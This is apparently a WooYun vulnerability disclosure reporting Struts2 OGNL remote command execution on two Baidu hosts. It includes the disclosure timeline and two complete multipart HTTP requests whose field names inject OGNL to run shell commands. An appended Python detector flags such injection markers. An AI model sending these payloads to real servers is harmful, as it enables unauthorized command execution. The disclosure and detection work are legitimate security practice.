WooYun (WooYun.org) historical vulnerability search---http://wy.zone.ci/
WooYun Drops articles, online reader--------http://drop.zone.ci/
2015-10-19: Details sent to the vendor; awaiting the vendor's handling
2015-10-19: Vendor has confirmed; details disclosed to the vendor only
2015-10-29: Details disclosed to core white hats and experts in the relevant field
2015-11-08: Details disclosed to regular white hats
2015-11-18: Details disclosed to intern white hats
2015-12-03: Details disclosed to the public
Struts2 command execution
Found two more, same as WooYun: Struts2 command execution on a Baidu site (unusual execution technique)
http://wangdan.baidu.com/netorderimport/onlineApplication.action
http://yingxiao.baidu.com/zhichi/welcome.action
POST http://yingxiao.baidu.com/zhichi/welcome.action HTTP/1.1
User-Agent: curl/7.33.0
Host: wangdan.baidu.com
Accept: */*
Proxy-Connection: Keep-Alive
Content-Length: 414
Content-Type: multipart/form-data; boundary=------------------------8102ab1e697452a5

--------------------------8102ab1e697452a5
Content-Disposition: form-data; name="redirect:/${#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#f.setAccessible(true),#f.set(#_memberAccess,true),@org.apache.commons.io.IOUtils@toString(new java.io.InputStreamReader(new java.lang.ProcessBuilder({'sh','-c','id'}).start().getInputStream()))}"

1
--------------------------8102ab1e697452a5--

POST http://wangdan.baidu.com/netorderimport/onlineApplication.action HTTP/1.1
User-Agent: curl/7.33.0
Host: wangdan.baidu.com
Accept: */*
Proxy-Connection: Keep-Alive
Content-Length: 420
Content-Type: multipart/form-data; boundary=------------------------8102ab1e697452a5

--------------------------8102ab1e697452a5
Content-Disposition: form-data; name="redirect:/${#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#f.setAccessible(true),#f.set(#_memberAccess,true),@org.apache.commons.io.IOUtils@toString(new java.io.InputStreamReader(new java.lang.ProcessBuilder({'sh','-c','ifconfig'}).start().getInputStream()))}"

1
--------------------------8102ab1e697452a5--
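As an added defender-side example (not part of the original report), the Python below parses a multipart request of the shape shown above and flags form-field names that carry the Struts2 OGNL markers this report relies on (the redirect: prefix, #_memberAccess and allowStaticMethodAccess). The sample request, the marker list and the scoring rule are my own construction, not anything from the report or from Struts.

```python
import re

# Indicators taken from the requests in this report: a redirect:/action:
# prefix carrying an OGNL expression, and the #_memberAccess /
# allowStaticMethodAccess sandbox bypass. The list itself is my assumption.
OGNL_PREFIX = re.compile(r'^(redirect|redirectAction|action):')
OGNL_MARKERS = ('${', '%{', '#_memberAccess', 'allowStaticMethodAccess',
                'ProcessBuilder', '@java.lang.Runtime@')
NAME_RE = re.compile(r'name="([^"]*)"', re.I)


def multipart_field_names(raw):
    """Return the form-data field names of a raw HTTP request (headers + body)."""
    head, _, body = raw.partition('\r\n\r\n')
    m = re.search(r'boundary=(\S+)', head, re.I)
    if not m:
        return []
    delim = '--' + m.group(1).strip('"')
    names = []
    for part in body.split(delim)[1:]:        # drop the preamble before the first delimiter
        if part.startswith('--'):             # closing delimiter reached
            break
        part_head = part.partition('\r\n\r\n')[0]
        nm = NAME_RE.search(part_head)
        if nm:
            names.append(nm.group(1))
    return names


def is_ognl_injection(name):
    """Flag a field name if it has OGNL markers and either the prefix or several markers."""
    hits = [mk for mk in OGNL_MARKERS if mk in name]
    return bool(hits) and (bool(OGNL_PREFIX.match(name)) or len(hits) >= 2)


def ognl_findings(raw):
    """(field name, matched markers) for every suspicious part of the request."""
    return [(n, [mk for mk in OGNL_MARKERS if mk in n])
            for n in multipart_field_names(raw) if is_ognl_injection(n)]


# Constructed sample: same boundary layout as the report, one benign field and one
# field name using the report's bypass fragment (no command part included).
BOUNDARY = '------------------------8102ab1e697452a5'
SUSPICIOUS_NAME = ("redirect:/${#f=#_memberAccess.getClass()"
                   ".getDeclaredField('allowStaticMethodAccess')}")
SAMPLE_REQUEST = '\r\n'.join([
    'POST /zhichi/welcome.action HTTP/1.1', 'Host: example.invalid',
    'Content-Type: multipart/form-data; boundary=' + BOUNDARY, '',
    '--' + BOUNDARY, 'Content-Disposition: form-data; name="comment"', '', 'hello',
    '--' + BOUNDARY, 'Content-Disposition: form-data; name="%s"' % SUSPICIOUS_NAME, '', '1',
    '--' + BOUNDARY + '--', '',
])
```

Running `ognl_findings(SAMPLE_REQUEST)` reports only the second part; a plain `redirect:/index.jsp` name is not flagged because it carries no expression marker.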
Severity: High
Vulnerability Rank: 20
Confirmed at: 2015-10-19 17:24
Thank you for your attention to Baidu Security
None yet